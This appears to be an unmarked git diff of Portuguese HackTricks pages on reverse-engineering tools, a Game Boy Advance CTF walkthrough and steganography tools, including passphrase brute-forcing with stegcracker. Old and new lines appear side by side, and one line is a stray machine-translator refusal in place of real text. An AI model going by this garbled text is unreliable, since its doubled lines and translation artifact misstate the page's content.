Também é muito interessante porque, se você pressionar um botão na aplicação gráfica, o depurador parará na função executada por esse botão.
## Golang
Se você precisar reverter um binário Golang, sugiro que use o plugin do IDA [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
Se você precisa reverter um binário Golang, sugiro usar o plugin do IDA [https://github.com/sibears/IDAGolangHelper](https://github.com/sibears/IDAGolangHelper)
Basta pressionar **ATL+f7** (importar plugin python no IDA) e selecionar o plugin python.
Basta pressionar **ALT+f7** (importar plugin python no IDA) e selecionar o plugin python.
Isso resolverá os nomes das funções.
## Python compilado
## Python Compilado
Nesta página, você pode encontrar como obter o código Python de um binário compilado ELF/EXE:
Nesta página, você pode encontrar como obter o código python de um binário python compilado ELF/EXE:
{% content-ref url="../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md" %}
[.pyc.md](../../forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
{% endcontent-ref %}
## GBA - Game Body Advance
## GBA - Game Boy Advance
Se você tiver o **binário** de um jogo GBA, você pode usar diferentes ferramentas para **emular** e **depurar**:
Se você obter o **binário** de um jogo GBA, pode usar diferentes ferramentas para **emular** e **depurar**:
* [**no$gba**](https://problemkaputt.de/gba.htm) (_Baixe a versão de depuração_) - Contém um depurador com interface
* [**mgba** ](https://mgba.io)- Contém um depurador CLI
* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Plugin do Ghidra
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Plugin do Ghidra
* [**gba-ghidra-loader**](https://github.com/pudii/gba-ghidra-loader) - Plugin Ghidra
* [**GhidraGBA**](https://github.com/SiD3W4y/GhidraGBA) - Plugin Ghidra
No [**no$gba**](https://problemkaputt.de/gba.htm), em _**Options --> Emulation Setup --> Controls**_\*\* \*\* você pode ver como pressionar os **botões** do Game Boy Advance
No [**no$gba**](https://problemkaputt.de/gba.htm), em _**Opções --> Configuração de Emulação --> Controles**_\*\* \*\* você pode ver como pressionar os **botões** do Game Boy Advance
![](<../../.gitbook/assets/image (578).png>)
Quando pressionado, cada **tecla tem um valor** para identificá-la:
Quando pressionada, cada **tecla tem um valor** para identificá-la:
```
A = 1
B = 2
@ -343,13 +326,13 @@ DOWN = 128
R = 256
L = 256
```
Então, nesse tipo de programa, uma parte interessante será **como o programa trata a entrada do usuário**. No endereço **0x4000130**, você encontrará a função comumente encontrada: **KEYINPUT**.
Portanto, neste tipo de programas, a parte interessante será **como o programa trata a entrada do usuário**. No endereço **0x4000130**, você encontrará a função comumente encontrada: **KEYINPUT.**
![](<../../.gitbook/assets/image (579).png>)
Na imagem anterior, você pode ver que a função é chamada de **FUN_080015a8** (endereços: _0x080015fa_ e _0x080017ac_).
Na imagem anterior, você pode ver que a função é chamada de **FUN\_080015a8** (endereços: _0x080015fa_ e _0x080017ac_).
Nessa função, após algumas operações de inicialização (sem importância alguma):
Nessa função, após algumas operações de inicialização (sem qualquer importância):
```c
void FUN_080015a8(void)
@ -370,7 +353,7 @@ FUN_08000dd0(&DAT_02009584,0x6000000,&DAT_030000dc);
FUN_08000354(&DAT_030000dc,0x3c);
uVar4 = DAT_030004d8;
```
Foi encontrado este código:
Como o conteúdo específico do código não foi fornecido, não posso traduzir nada. Por favor, forneça o texto em inglês que precisa ser traduzido para o português.
```c
do {
DAT_030004da = uVar4; //This is the last key pressed
@ -382,7 +365,7 @@ uVar2 = DAT_030004dc;
uVar1 = *puVar6;
if ((uVar1 & DAT_030004da & ~uVar4) != 0) {
```
O último "if" verifica se **`uVar4`** está nas **últimas teclas** e não é a tecla atual, também conhecida como soltar um botão (a tecla atual é armazenada em **`uVar1`**).
O último if verifica se **`uVar4`** está nas **últimas teclas** e não é a tecla atual, também conhecido como soltar um botão (a tecla atual está armazenada em **`uVar1`**).
```c
if (uVar1 == 4) {
DAT_030000d4 = 0;
@ -412,13 +395,13 @@ DAT_030000d8 = DAT_030000d8 + 0x3a;
```
No código anterior, você pode ver que estamos comparando **uVar1** (o local onde está o **valor do botão pressionado**) com alguns valores:
* Primeiro, é comparado com o **valor 4** (botão **SELECT**): Neste desafio, esse botão limpa a tela.
* Em seguida, é comparado com o **valor 8** (botão **START**): Neste desafio, isso verifica se o código é válido para obter a bandeira.
* Neste caso, a variável **`DAT_030000d8`** é comparada com 0xf3 e, se o valor for o mesmo, algum código é executado.
* Em todos os outros casos, é verificado um contador (`DAT_030000d4`). É um contador porque ele adiciona 1 logo após entrar no código.\
Se for menor que 8, algo que envolve **adicionar** valores a \*\*`DAT_030000d8` \*\* é feito (basicamente, está adicionando os valores dos botões pressionados nesta variável, desde que o contador seja menor que 8).
* Primeiro, é comparado com o **valor 4** (botão **SELECT**): No desafio, este botão limpa a tela.
* Em seguida, ele é comparado com o **valor 8** (botão **START**): No desafio, isso verifica se o código é válido para obter a flag.
* Neste caso, a var **`DAT_030000d8`** é comparada com 0xf3 e, se o valor for o mesmo, algum código é executado.
* Em qualquer outro caso, um contador (`DAT_030000d4`) é verificado. É um contador porque está adicionando 1 logo após entrar no código.\
**Se** for menos que 8, algo que envolve **adicionar** valores a **`DAT_030000d8`** é feito (basicamente, está adicionando os valores das teclas pressionadas nesta variável, desde que o contador seja menor que 8).
Portanto, neste desafio, sabendo os valores dos botões, você precisava **pressionar uma combinação com um comprimento menor que 8 para que a adição resultante seja 0xf3**.
Portanto, neste desafio, conhecendo os valores dos botões, você precisava **pressionar uma combinação com um comprimento menor que 8, que a adição resultante seja 0xf3.**
**Referência para este tutorial:** [**https://exp.codes/Nostalgia/**](https://exp.codes/Nostalgia/)
@ -429,23 +412,25 @@ Portanto, neste desafio, sabendo os valores dos botões, você precisava **press
## Cursos
* [https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering](https://github.com/0xZ0F/Z0FCourse\_ReverseEngineering)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Binary deobfuscation)
* [https://github.com/malrev/ABD](https://github.com/malrev/ABD) (Desobfuscação binária)
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? Ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtenha o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras maneiras de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**merchandising oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas dicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

117
stego/stego-tricks.md
View file

@ -1,20 +1,22 @@
# Truques de Esteganografia
# Técnicas de Esteganografia
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de segurança cibernética**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs exclusivos**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) no github.
</details>
<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rapidamente. Intruder monitora sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente grátis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -24,34 +26,34 @@ Encontre vulnerabilidades que são mais importantes para que você possa corrigi
### Binwalk <a href="#binwalk" id="binwalk"></a>
O Binwalk é uma ferramenta para pesquisar arquivos binários, como imagens e arquivos de áudio, em busca de arquivos e dados ocultos embutidos.\
Ele pode ser instalado com `apt`, e a [fonte](https://github.com/ReFirmLabs/binwalk) pode ser encontrada no Github.\
Binwalk é uma ferramenta para pesquisar arquivos binários, como imagens e arquivos de áudio, em busca de arquivos ocultos e dados embutidos.\
Pode ser instalado com `apt`, e o [código-fonte](https://github.com/ReFirmLabs/binwalk) está disponível no Github.\
**Comandos úteis**:\
`binwalk arquivo` : Exibe os dados embutidos no arquivo fornecido\
`binwalk -e arquivo` : Exibe e extrai os dados do arquivo fornecido\
`binwalk --dd ".*" arquivo` : Exibe e extrai os dados do arquivo fornecido
`binwalk arquivo` : Exibe os dados embutidos no arquivo especificado\
`binwalk -e arquivo` : Exibe e extrai os dados do arquivo especificado\
`binwalk --dd ".*" arquivo` : Exibe e extrai todos os dados do arquivo especificado
### Foremost <a href="#foremost" id="foremost"></a>
O Foremost é um programa que recupera arquivos com base em seus cabeçalhos, rodapés e estruturas de dados internas. Eu acho especialmente útil ao lidar com imagens png. Você pode selecionar os arquivos que o Foremost irá extrair alterando o arquivo de configuração em **/etc/foremost.conf.**\
Ele pode ser instalado com `apt`, e a [fonte](https://github.com/korczis/foremost) pode ser encontrada no Github.\
Foremost é um programa que recupera arquivos baseados em seus cabeçalhos, rodapés e estruturas de dados internas. Acho especialmente útil ao lidar com imagens png. Você pode selecionar os arquivos que o Foremost irá extrair alterando o arquivo de configuração em **/etc/foremost.conf.**\
Pode ser instalado com `apt`, e o [código-fonte](https://github.com/korczis/foremost) está disponível no Github.\
**Comandos úteis:**\
`foremost -i arquivo` : extrai dados do arquivo fornecido.
`foremost -i arquivo` : extrai dados do arquivo especificado.
### Exiftool <a href="#exiftool" id="exiftool"></a>
Às vezes, coisas importantes estão ocultas nos metadados de uma imagem ou arquivo; o exiftool pode ser muito útil para visualizar os metadados do arquivo.\
Às vezes, informações importantes estão ocultas nos metadados de uma imagem ou arquivo; exiftool pode ser muito útil para visualizar metadados de arquivos.\
Você pode obtê-lo [aqui](https://www.sno.phy.queensu.ca/\~phil/exiftool/)\
**Comandos úteis:**\
`exiftool arquivo` : mostra os metadados do arquivo fornecido
`exiftool arquivo` : mostra os metadados do arquivo especificado
### Exiv2 <a href="#exiv2" id="exiv2"></a>
Uma ferramenta semelhante ao exiftool.\
Ele pode ser instalado com `apt`, e a [fonte](https://github.com/Exiv2/exiv2) pode ser encontrada no Github.\
Pode ser instalado com `apt`, e o [código-fonte](https://github.com/Exiv2/exiv2) está disponível no Github.\
[Site oficial](http://www.exiv2.org/)\
**Comandos úteis:**\
`exiv2 arquivo` : mostra os metadados do arquivo fornecido
`exiv2 arquivo` : mostra os metadados do arquivo especificado
### File
@ -61,7 +63,7 @@ Verifique que tipo de arquivo você tem
Extraia strings do arquivo.\
Comandos úteis:\
`strings -n 6 arquivo`: Extrai as strings com comprimento mínimo de 6\
`strings -n 6 arquivo`: Extrai strings com comprimento mínimo de 6\
`strings -n 6 arquivo | head -n 20`: Extrai as primeiras 20 strings com comprimento mínimo de 6\
`strings -n 6 arquivo | tail -n 20`: Extrai as últimas 20 strings com comprimento mínimo de 6\
`strings -e s -n 6 arquivo`: Extrai strings de 7 bits\
@ -73,7 +75,7 @@ Comandos úteis:\
### cmp - Comparação
Se você tem alguma imagem/áudio/vídeo **modificado**, verifique se você pode **encontrar o original exato** na internet, então **compare ambos** os arquivos com:
Se você tem alguma imagem/áudio/vídeo **modificado**, verifique se consegue **encontrar o original exato** na internet, depois **compare ambos** arquivos com:
```
cmp original.jpg stego.jpg -b -l
```
@ -81,14 +83,14 @@ cmp original.jpg stego.jpg -b -l
### Dados ocultos em espaços
Se você perceber que uma **linha de texto** está **maior** do que deveria, então algumas **informações ocultas** podem estar incluídas dentro dos **espaços** usando caracteres invisíveis.󐁈󐁥󐁬󐁬󐁯󐀠󐁴󐁨\
Se você encontrar que uma **linha de texto** está **maior** do que deveria ser, então algumas **informações ocultas** podem estar incluídas dentro dos **espaços** usando caracteres invisíveis.󐁈󐁥󐁬󐁬󐁯󐀠󐁴󐁨\
Para **extrair** os **dados**, você pode usar: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, utilizando as ferramentas comunitárias mais avançadas do mundo.\
Acesse hoje mesmo:
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) para construir e **automatizar fluxos de trabalho** facilmente, alimentados pelas ferramentas comunitárias **mais avançadas** do mundo.\
Obtenha Acesso Hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -96,47 +98,47 @@ Acesse hoje mesmo:
### identify
Ferramenta [GraphicMagick](https://imagemagick.org/script/download.php) para verificar qual tipo de imagem um arquivo é. Também verifica se a imagem está corrompida.
Ferramenta [GraphicMagick](https://imagemagick.org/script/download.php) para verificar que tipo de imagem um arquivo é. Também verifica se a imagem está corrompida.
```
./magick identify -verbose stego.jpg
```
Se a imagem estiver danificada, você pode tentar restaurá-la simplesmente adicionando um comentário de metadados a ela (se estiver muito danificada, isso pode não funcionar):
Se a imagem estiver danificada, você pode ser capaz de restaurá-la simplesmente adicionando um comentário de metadados a ela (se estiver muito danificada, isso não funcionará):
```bash
./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg
```
### Steghide \[JPEG, BMP, WAV, AU] <a href="#steghide" id="steghide"></a>
Steghide é um programa de esteganografia que oculta dados em vários tipos de arquivos de imagem e áudio. Ele suporta os seguintes formatos de arquivo: `JPEG, BMP, WAV e AU`. Também é útil para extrair dados embutidos e criptografados de outros arquivos.\
Pode ser instalado com `apt`, e a [fonte](https://github.com/StefanoDeVuono/steghide) pode ser encontrada no Github.\
Pode ser instalado com `apt`, e o [código-fonte](https://github.com/StefanoDeVuono/steghide) pode ser encontrado no Github.\
**Comandos úteis:**\
`steghide info arquivo` : exibe informações sobre se um arquivo possui dados embutidos ou não.\
`steghide extract -sf arquivo [--passphrase senha]` : extrai dados embutidos de um arquivo \[usando uma senha]
`steghide info file` : exibe informações sobre se um arquivo tem dados embutidos ou não.\
`steghide extract -sf file [--passphrase password]` : extrai dados embutidos de um arquivo \[usando uma senha]
Você também pode extrair conteúdo do steghide usando a web: [https://futureboy.us/stegano/decinput.html](https://futureboy.us/stegano/decinput.html)
**Bruteforcing** Steghide: [stegcracker](https://github.com/Paradoxis/StegCracker.git) `stegcracker <arquivo> [<wordlist>]`
**Força bruta** no Steghide: [stegcracker](https://github.com/Paradoxis/StegCracker.git) `stegcracker <file> [<wordlist>]`
### Zsteg \[PNG, BMP] <a href="#zsteg" id="zsteg"></a>
zsteg é uma ferramenta que pode detectar dados ocultos em arquivos png e bmp.\
Para instalá-lo: `gem install zsteg`. A fonte também pode ser encontrada no [Github](https://github.com/zed-0xff/zsteg)\
Para instalá-lo: `gem install zsteg`. O código-fonte também pode ser encontrado no [Github](https://github.com/zed-0xff/zsteg)\
**Comandos úteis:**\
`zsteg -a arquivo` : Executa todos os métodos de detecção no arquivo fornecido\
`zsteg -E arquivo` : Extrai dados com a carga útil fornecida (exemplo: zsteg -E b4,bgr,msb,xy nome.png)
`zsteg -a file` : Executa todos os métodos de detecção no arquivo fornecido\
`zsteg -E file` : Extrai dados com o payload fornecido (exemplo: zsteg -E b4,bgr,msb,xy name.png)
### stegoVeritas JPG, PNG, GIF, TIFF, BMP
Capaz de uma ampla variedade de truques simples e avançados, essa ferramenta pode verificar metadados de arquivos, criar imagens transformadas, forçar LSB e muito mais. Confira `stegoveritas.py -h` para ler sobre todas as suas capacidades. Execute `stegoveritas.py stego.jpg` para executar todas as verificações.
Capaz de uma ampla variedade de truques simples e avançados, esta ferramenta pode verificar metadados de arquivos, criar imagens transformadas, força bruta em LSB e mais. Confira `stegoveritas.py -h` para ler sobre suas capacidades completas. Execute `stegoveritas.py stego.jpg` para rodar todas as verificações.
### Stegsolve
Às vezes, há uma mensagem ou um texto oculto na própria imagem que, para visualizá-lo, deve ter filtros de cor aplicados ou alguns níveis de cor alterados. Embora você possa fazer isso com algo como o GIMP ou o Photoshop, o Stegsolve torna mais fácil. É uma pequena ferramenta Java que aplica muitos filtros de cor úteis em imagens; em desafios CTF, o Stegsolve muitas vezes economiza muito tempo.\
Às vezes, há uma mensagem ou um texto oculto na própria imagem que, para visualizá-lo, deve ter filtros de cores aplicados ou alguns níveis de cores alterados. Embora você possa fazer isso com algo como GIMP ou Photoshop, Stegsolve facilita. É uma pequena ferramenta Java que aplica muitos filtros de cores úteis em imagens; Em desafios de CTF, Stegsolve é frequentemente um grande economizador de tempo.\
Você pode obtê-lo no [Github](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)\
Para usá-lo, basta abrir a imagem e clicar nos botões `<` `>`.
### FFT
Para encontrar conteúdo oculto usando Fast Fourier T:
Para encontrar conteúdo oculto usando Transformada Rápida de Fourier (FFT):
* [http://bigwww.epfl.ch/demo/ip/demos/FFT/](http://bigwww.epfl.ch/demo/ip/demos/FFT/)
* [https://www.ejectamenta.com/Fourifier-fullscreen/](https://www.ejectamenta.com/Fourifier-fullscreen/)
@ -145,12 +147,12 @@ Para encontrar conteúdo oculto usando Fast Fourier T:
### Stegpy \[PNG, BMP, GIF, WebP, WAV]
Um programa para codificar informações em arquivos de imagem e áudio por meio de esteganografia. Ele pode armazenar os dados como texto simples ou criptografado.\
Um programa para codificar informações em arquivos de imagem e áudio através de esteganografia. Pode armazenar os dados como texto simples ou criptografado.\
Encontre-o no [Github](https://github.com/dhsdshdhk/stegpy).
### Pngcheck
Obtenha detalhes sobre um arquivo PNG (ou até descubra se na verdade é algo diferente!).\
Obtenha detalhes sobre um arquivo PNG (ou até descubra se é na verdade algo diferente!).\
`apt-get install pngcheck`: Instale a ferramenta\
`pngcheck stego.png` : Obtenha informações sobre o PNG
@ -175,21 +177,22 @@ ffmpeg pode ser usado para verificar a integridade de arquivos de áudio, relata
### Wavsteg \[WAV] <a href="#wavsteg" id="wavsteg"></a>
WavSteg é uma ferramenta em Python3 que pode ocultar dados, usando o bit menos significativo, em arquivos wav. Também pode procurar e extrair dados de arquivos wav.\
WavSteg é uma ferramenta Python3 que pode ocultar dados, usando o bit menos significativo, em arquivos wav. Também pode procurar e extrair dados de arquivos wav.\
Você pode obtê-lo no [Github](https://github.com/ragibson/Steganography#WavSteg)\
Comandos úteis:\
`python3 WavSteg.py -r -b 1 -s arquivo_de_som -o arquivo_de_saida` : Extrai para um arquivo de saída (levando apenas 1 lsb)\
`python3 WavSteg.py -r -b 2 -s arquivo_de_som -o arquivo_de_saida` : Extrai para um arquivo de saída (levando apenas 2 lsb)
`python3 WavSteg.py -r -b 1 -s soundfile -o outputfile` : Extrai para um arquivo de saída (pegando apenas 1 lsb)\
`python3 WavSteg.py -r -b 2 -s soundfile -o outputfile` : Extrai para um arquivo de saída (pegando apenas 2 lsb)
### Deepsound
Oculta e verifica informações criptografadas com AES-265 em arquivos de som. Faça o download na [página oficial](http://jpinsoft.net/deepsound/download.aspx).\
Para procurar informações ocultas, basta executar o programa e abrir o arquivo de som. Se o DeepSound encontrar algum dado oculto, você precisará fornecer a senha para desbloqueá-lo.
Oculte e verifique informações criptografadas com AES-265 em arquivos de som. Baixe da [página oficial](http://jpinsoft.net/deepsound/download.aspx).\
Para procurar informações ocultas, basta executar o programa e abrir o arquivo de som. Se o DeepSound encontrar dados ocultos, você precisará fornecer a senha para desbloqueá-los.
### Sonic visualizer <a href="#sonic-visualizer" id="sonic-visualizer"></a>
Sonic visualizer é uma ferramenta para visualizar e analisar o conteúdo de arquivos de áudio. Pode ser muito útil ao enfrentar desafios de esteganografia de áudio; você pode revelar formas ocultas em arquivos de áudio que muitas outras ferramentas não detectarão.\
Se estiver preso, sempre verifique o espectrograma do áudio. [Site oficial](https://www.sonicvisualiser.org/)
Sonic visualizer é uma ferramenta para visualizar e analisar o conteúdo de arquivos de áudio. Pode ser muito útil ao enfrentar desafios de esteganografia de áudio; você pode revelar formas ocultas em arquivos de áudio que muitas outras ferramentas não detectam.\
Se estiver com dificuldades, sempre verifique o espectrograma do áudio. [Site Oficial](https://www.sonicvisualiser.org/)
### Tons DTMF - Tons de discagem
* [https://unframework.github.io/dtmf-detect/](https://unframework.github.io/dtmf-detect/)
@ -204,10 +207,10 @@ Se você receber dados binários com um comprimento SQRT de um número inteiro,
import math
math.sqrt(2500) #50
```
Para converter os "1"s e "0"s binários em uma imagem adequada: [https://www.dcode.fr/binary-image](https://github.com/carlospolop/hacktricks/tree/32fa51552498a17d266ff03e62dfd1e2a61dcd10/binary-image/README.md)\
Para converter binários "1"s e "0"s em uma imagem adequada: [https://www.dcode.fr/binary-image](https://github.com/carlospolop/hacktricks/tree/32fa51552498a17d266ff03e62dfd1e2a61dcd10/binary-image/README.md)\
Para ler um código QR: [https://online-barcode-reader.inliteresearch.com/](https://online-barcode-reader.inliteresearch.com/)
### Braille
### Braile
[https://www.branah.com/braille-translator](https://www.branah.com/braille-translator\))
@ -218,18 +221,20 @@ Para ler um código QR: [https://online-barcode-reader.inliteresearch.com/](http
<figure><img src="../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Encontre vulnerabilidades que são mais importantes para que você possa corrigi-las mais rapidamente. O Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha de tecnologia, desde APIs até aplicativos da web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
Encontre vulnerabilidades que importam mais para que você possa corrigi-las mais rápido. Intruder rastreia sua superfície de ataque, executa varreduras proativas de ameaças, encontra problemas em toda a sua pilha tecnológica, de APIs a aplicativos web e sistemas em nuvem. [**Experimente gratuitamente**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) hoje.
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>Aprenda hacking em AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* Você trabalha em uma **empresa de cibersegurança**? Você quer ver sua **empresa anunciada no HackTricks**? ou você quer ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para o** [**repositório hacktricks**](https://github.com/carlospolop/hacktricks) **e** [**repositório hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
Outras formas de apoiar o HackTricks:
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
